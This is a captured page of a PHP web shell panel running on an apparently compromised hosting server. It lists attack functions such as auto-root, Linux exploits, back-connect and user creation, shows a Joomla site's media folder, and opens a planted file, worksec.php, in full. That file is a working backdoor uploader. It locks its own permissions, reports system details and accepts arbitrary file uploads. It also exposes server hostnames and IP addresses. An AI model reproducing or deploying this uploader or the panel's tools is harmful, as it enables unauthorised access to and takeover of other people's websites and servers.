Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
ptitsanes /
media /
[ HOME SHELL ]
Name
Size
Permission
Action
cms
[ DIR ]
drwxr-xr-x
com_associations
[ DIR ]
drwxr-xr-x
com_contact
[ DIR ]
drwxr-xr-x
com_content
[ DIR ]
drwxr-xr-x
com_contenthistory
[ DIR ]
drwxr-xr-x
com_fields
[ DIR ]
drwxr-xr-x
com_finder
[ DIR ]
drwxr-xr-x
com_icagenda
[ DIR ]
drwxr-xr-x
com_joomlaupdate
[ DIR ]
drwxr-xr-x
com_menus
[ DIR ]
drwxr-xr-x
com_modules
[ DIR ]
drwxr-xr-x
com_solidres
[ DIR ]
drwxr-xr-x
com_wrapper
[ DIR ]
drwxr-xr-x
contacts
[ DIR ]
drwxr-xr-x
editors
[ DIR ]
drwxr-xr-x
gantry5
[ DIR ]
drwx---r-x
jui
[ DIR ]
drwxr-xr-x
mailto
[ DIR ]
drwxr-xr-x
media
[ DIR ]
drwxr-xr-x
mod_falang
[ DIR ]
drwxr-xr-x
mod_languages
[ DIR ]
drwxr-xr-x
mod_sampledata
[ DIR ]
drwxr-xr-x
overrider
[ DIR ]
drwxr-xr-x
plg_captcha_recaptcha
[ DIR ]
drwxr-xr-x
plg_captcha_recaptcha_invisibl...
[ DIR ]
drwxr-xr-x
plg_installer_webinstaller
[ DIR ]
drwxr-xr-x
plg_quickicon_eos310
[ DIR ]
drwxr-xr-x
plg_quickicon_extensionupdate
[ DIR ]
drwxr-xr-x
plg_quickicon_joomlaupdate
[ DIR ]
drwxr-xr-x
plg_quickicon_privacycheck
[ DIR ]
drwxr-xr-x
plg_solidres_complextariff
[ DIR ]
drwxr-xr-x
plg_solidres_experience
[ DIR ]
drwxr-xr-x
plg_solidres_feedback
[ DIR ]
drwxr-xr-x
plg_solidres_limitbooking
[ DIR ]
drwxr-xr-x
plg_solidres_statistics
[ DIR ]
drwxr-xr-x
plg_system_highlight
[ DIR ]
drwxr-xr-x
plg_system_stats
[ DIR ]
drwxr-xr-x
plg_twofactorauth_totp
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
admin.php
5.24
KB
-rw-r--r--
ahax.php
107
B
-rw-r--r--
index.html
31
B
-rw-r--r--
index.php
14
KB
-rw-r--r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : worksec.php
<?php // Path to the file $file = 'worksec.php'; // Change the file permissions to 0444 (read-only) chmod($file, 0444); ?> <?php error_reporting(0); set_time_limit(0); $user = get_current_user(); echo "<center><b>Uname:".php_uname()."<br></b>"; echo "<br><b>Base Dir : ".getcwd()."<br></b>"; echo "<br><b>User : ".$user."<br></b>"; echo '<br><font color="black" size="4">'; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo" <a href=$userfile_name><center><b>Sucessfully Uploaded :D ==> $userfile_name</b></center></a>"; } }else{ echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; } echo '</center></font>'; ?>
Close